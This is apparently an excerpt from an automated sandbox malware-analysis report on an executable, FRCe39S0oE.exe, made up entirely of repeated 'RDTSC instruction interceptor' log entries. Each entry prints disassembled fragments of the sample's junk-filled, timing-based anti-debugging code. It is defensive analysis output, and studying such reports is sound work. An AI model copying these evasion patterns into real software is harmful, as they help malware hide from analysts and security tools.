Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 4FE0F50 second address: 4FE0F9D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, cx 0x00000006 mov dx, si 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, ebp 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F132877E3B2h 0x00000014 adc eax, 71E0B578h 0x0000001a jmp 00007F132877E3ABh 0x0000001f popfd 0x00000020 mov cx, 84AFh 0x00000024 popad 0x00000025 mov ebp, esp 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F132877E3B1h 0x0000002e rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 4FE0F9D second address: 4FE0FAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1328EC0DFCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 4FE0FAD second address: 4FE0FB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 50303BB second address: 50303BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 50303BF second address: 50303C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 50303C5 second address: 5030424 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop esi 0x00000005 mov ecx, edx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ebp 0x0000000b pushad 0x0000000c pushad 0x0000000d jmp 00007F1328EC0DFFh 0x00000012 pushfd 0x00000013 jmp 00007F1328EC0E08h 0x00000018 add cx, C1A8h 0x0000001d jmp 00007F1328EC0DFBh 0x00000022 popfd 0x00000023 popad 0x00000024 mov ah, 30h 0x00000026 popad 0x00000027 mov ebp, esp 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c jmp 00007F1328EC0DFCh 0x00000031 movzx esi, bx 0x00000034 popad 0x00000035 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 5030424 second address: 5030440 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx eax, di 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F132877E3AEh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 4FA0C1A second address: 4FA0C1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 4FA0C1E second address: 4FA0C24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 4FA0C24 second address: 4FA0CD1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F1328EC0E09h 0x00000009 jmp 00007F1328EC0DFBh 0x0000000e popfd 0x0000000f call 00007F1328EC0E08h 0x00000014 pop ecx 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push dword ptr [ebp+04h] 0x0000001b pushad 0x0000001c jmp 00007F1328EC0E07h 0x00000021 mov ebx, esi 0x00000023 popad 0x00000024 push dword ptr [ebp+0Ch] 0x00000027 pushad 0x00000028 mov di, ax 0x0000002b mov si, CC93h 0x0000002f popad 0x00000030 push dword ptr [ebp+08h] 0x00000033 pushad 0x00000034 call 00007F1328EC0E04h 0x00000039 pushfd 0x0000003a jmp 00007F1328EC0E02h 0x0000003f xor cl, 00000048h 0x00000042 jmp 00007F1328EC0DFBh 0x00000047 popfd 0x00000048 pop eax 0x00000049 push edx 0x0000004a push eax 0x0000004b push edx 0x0000004c rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 4FE0BA9 second address: 4FE0BAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 4FE0BAD second address: 4FE0BC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 movsx ebx, ax 0x00000009 popad 0x0000000a xchg eax, ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F1328EC0DFDh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 4FE0BC7 second address: 4FE0C1D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, bx 0x00000006 push ebx 0x00000007 pop eax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push esi 0x0000000e mov ch, dh 0x00000010 pop eax 0x00000011 pushfd 0x00000012 jmp 00007F132877E3B3h 0x00000017 or ecx, 6DA180EEh 0x0000001d jmp 00007F132877E3B9h 0x00000022 popfd 0x00000023 popad 0x00000024 xchg eax, ebp 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F132877E3ADh 0x0000002c rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 4FE0C1D second address: 4FE0C98 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F1328EC0E07h 0x00000009 add cx, CBAEh 0x0000000e jmp 00007F1328EC0E09h 0x00000013 popfd 0x00000014 jmp 00007F1328EC0E00h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c mov ebp, esp 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 pushfd 0x00000022 jmp 00007F1328EC0DFDh 0x00000027 xor esi, 68430A96h 0x0000002d jmp 00007F1328EC0E01h 0x00000032 popfd 0x00000033 mov ch, 03h 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 4FE0C98 second address: 4FE0CDE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ebx 0x00000005 pushfd 0x00000006 jmp 00007F132877E3B4h 0x0000000b xor si, F1E8h 0x00000010 jmp 00007F132877E3ABh 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 pop ebp 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F132877E3B5h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 4FD0944 second address: 4FD09A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F1328EC0E08h 0x00000009 sub cx, AB78h 0x0000000e jmp 00007F1328EC0DFBh 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007F1328EC0E08h 0x0000001a adc si, 45D8h 0x0000001f jmp 00007F1328EC0DFBh 0x00000024 popfd 0x00000025 popad 0x00000026 pop edx 0x00000027 pop eax 0x00000028 pop ebp 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c mov ecx, 53B599DDh 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 50209AB second address: 50209BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F132877E3ACh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 50209BB second address: 50209BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 50208CD second address: 502091C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F132877E3AFh 0x00000009 xor ecx, 50E5F40Eh 0x0000000f jmp 00007F132877E3B9h 0x00000014 popfd 0x00000015 call 00007F132877E3B0h 0x0000001a pop eax 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e mov ebp, esp 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 502091C second address: 5020920 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 5020920 second address: 5020924 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 5020924 second address: 502092A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 502092A second address: 5020930 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 5020930 second address: 5020934 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 5020732 second address: 5020740 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F132877E3AAh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 5020740 second address: 5020744 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 5020744 second address: 502076A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F132877E3B9h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 502076A second address: 5020770 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 4FE0D53 second address: 4FE0D59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 4FE0D59 second address: 4FE0D5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 4FE0D5D second address: 4FE0D89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F132877E3AAh 0x00000010 adc eax, 78FC6E98h 0x00000016 jmp 00007F132877E3ABh 0x0000001b popfd 0x0000001c push eax 0x0000001d push edx 0x0000001e movzx esi, dx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 5020D9F second address: 5020DAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1328EC0DFCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 5020DAF second address: 5020DB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 5020DB3 second address: 5020E6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F1328EC0DFCh 0x00000010 jmp 00007F1328EC0E05h 0x00000015 popfd 0x00000016 jmp 00007F1328EC0E00h 0x0000001b popad 0x0000001c xchg eax, ebp 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007F1328EC0DFEh 0x00000024 jmp 00007F1328EC0E05h 0x00000029 popfd 0x0000002a push eax 0x0000002b mov ecx, edi 0x0000002d pop edi 0x0000002e popad 0x0000002f mov ebp, esp 0x00000031 jmp 00007F1328EC0E06h 0x00000036 mov eax, dword ptr [ebp+08h] 0x00000039 jmp 00007F1328EC0E00h 0x0000003e and dword ptr [eax], 00000000h 0x00000041 pushad 0x00000042 push eax 0x00000043 push edx 0x00000044 pushfd 0x00000045 jmp 00007F1328EC0DFCh 0x0000004a sbb eax, 5CF11418h 0x00000050 jmp 00007F1328EC0DFBh 0x00000055 popfd 0x00000056 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 50200DC second address: 50200E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 50200E2 second address: 5020107 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1328EC0DFEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F1328EC0DFBh 0x0000000f xchg eax, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 5020107 second address: 502010B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 502010B second address: 5020111 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 5020BFC second address: 5020C0B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F132877E3ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 5020C0B second address: 5020C11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 5020C11 second address: 5020C15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 4FF0ADB second address: 4FF0ADF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 4FF0ADF second address: 4FF0AE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 4FF0AE3 second address: 4FF0AE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 4FF0AE9 second address: 4FF0B2E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F132877E3B4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov esi, edx 0x0000000d movsx ebx, cx 0x00000010 popad 0x00000011 xchg eax, ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007F132877E3B1h 0x0000001b jmp 00007F132877E3ABh 0x00000020 popfd 0x00000021 mov bh, ch 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 4FF0B2E second address: 4FF0B4C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1328EC0E02h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 4FF0B4C second address: 4FF0B50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 4FF0B50 second address: 4FF0B56 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 4FF0B56 second address: 4FF0B5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 4FF0B5C second address: 4FF0B60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 4FF0B60 second address: 4FF0B71 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebp+08h] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 4FF0B71 second address: 4FF0B75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 4FF0B75 second address: 4FF0B79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 4FF0B79 second address: 4FF0B7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 4FF0B7F second address: 4FF0BCF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F132877E3ACh 0x00000008 pop ecx 0x00000009 pushfd 0x0000000a jmp 00007F132877E3ABh 0x0000000f xor cx, A52Eh 0x00000014 jmp 00007F132877E3B9h 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d and dword ptr [eax], 00000000h 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F132877E3ADh 0x00000027 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 4FF0BCF second address: 4FF0BEE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1328EC0E01h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov esi, 2D09D325h 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 4FF0BEE second address: 4FF0BF4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 4FB00F7 second address: 4FB019A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1328EC0E09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F1328EC0E01h 0x0000000f xchg eax, ebp 0x00000010 jmp 00007F1328EC0DFEh 0x00000015 mov ebp, esp 0x00000017 jmp 00007F1328EC0E00h 0x0000001c and esp, FFFFFFF8h 0x0000001f pushad 0x00000020 mov di, ax 0x00000023 mov ax, 6999h 0x00000027 popad 0x00000028 xchg eax, ecx 0x00000029 pushad 0x0000002a jmp 00007F1328EC0E02h 0x0000002f jmp 00007F1328EC0E02h 0x00000034 popad 0x00000035 push eax 0x00000036 jmp 00007F1328EC0DFBh 0x0000003b xchg eax, ecx 0x0000003c push eax 0x0000003d push edx 0x0000003e pushad 0x0000003f movsx edi, ax 0x00000042 jmp 00007F1328EC0DFCh 0x00000047 popad 0x00000048 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 4FB019A second address: 4FB01B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F132877E3ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 4FB01B0 second address: 4FB01CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1328EC0E07h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 4FB01CB second address: 4FB020D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F132877E3B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F132877E3AAh 0x00000013 adc ecx, 15D5CEA8h 0x00000019 jmp 00007F132877E3ABh 0x0000001e popfd 0x0000001f mov bx, ax 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 4FB020D second address: 4FB0221 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1328EC0E00h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 4FB0221 second address: 4FB0225 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 4FB0225 second address: 4FB0260 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 pushad 0x0000000a jmp 00007F1328EC0DFDh 0x0000000f mov ecx, 65C01B77h 0x00000014 popad 0x00000015 mov ebx, dword ptr [ebp+10h] 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F1328EC0E09h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 4FB0260 second address: 4FB02A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F132877E3B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a jmp 00007F132877E3AEh 0x0000000f push eax 0x00000010 pushad 0x00000011 movsx ebx, si 0x00000014 movzx esi, dx 0x00000017 popad 0x00000018 xchg eax, esi 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F132877E3B0h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 4FB02A0 second address: 4FB02C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1328EC0DFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F1328EC0E05h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 4FB02C9 second address: 4FB02CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 4FB02CF second address: 4FB02D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 4FB02D3 second address: 4FB02D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 4FB02D7 second address: 4FB02F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F1328EC0DFEh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 4FB02F2 second address: 4FB02F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 4FB02F8 second address: 4FB030E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx ecx, dx 0x00000006 mov ecx, ebx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], edi 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 mov eax, 2D9A3C19h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 4FB030E second address: 4FB0370 instructions: 0x00000000 rdtsc 0x00000002 mov ebx, eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 test esi, esi 0x00000009 pushad 0x0000000a popad 0x0000000b je 00007F139B52C6A2h 0x00000011 jmp 00007F132877E3B4h 0x00000016 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000001d pushad 0x0000001e mov ebx, 0FC256F0h 0x00000023 popad 0x00000024 je 00007F139B52C690h 0x0000002a pushad 0x0000002b mov bx, 1408h 0x0000002f jmp 00007F132877E3B1h 0x00000034 popad 0x00000035 mov edx, dword ptr [esi+44h] 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007F132877E3ADh 0x0000003f rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 4FB0370 second address: 4FB0375 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 4FE0050 second address: 4FE0056 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 4FE0056 second address: 4FE005A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 4FE005A second address: 4FE0094 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F132877E3ABh 0x00000012 xor si, 53BEh 0x00000017 jmp 00007F132877E3B9h 0x0000001c popfd 0x0000001d mov bh, ah 0x0000001f popad 0x00000020 rdtsc
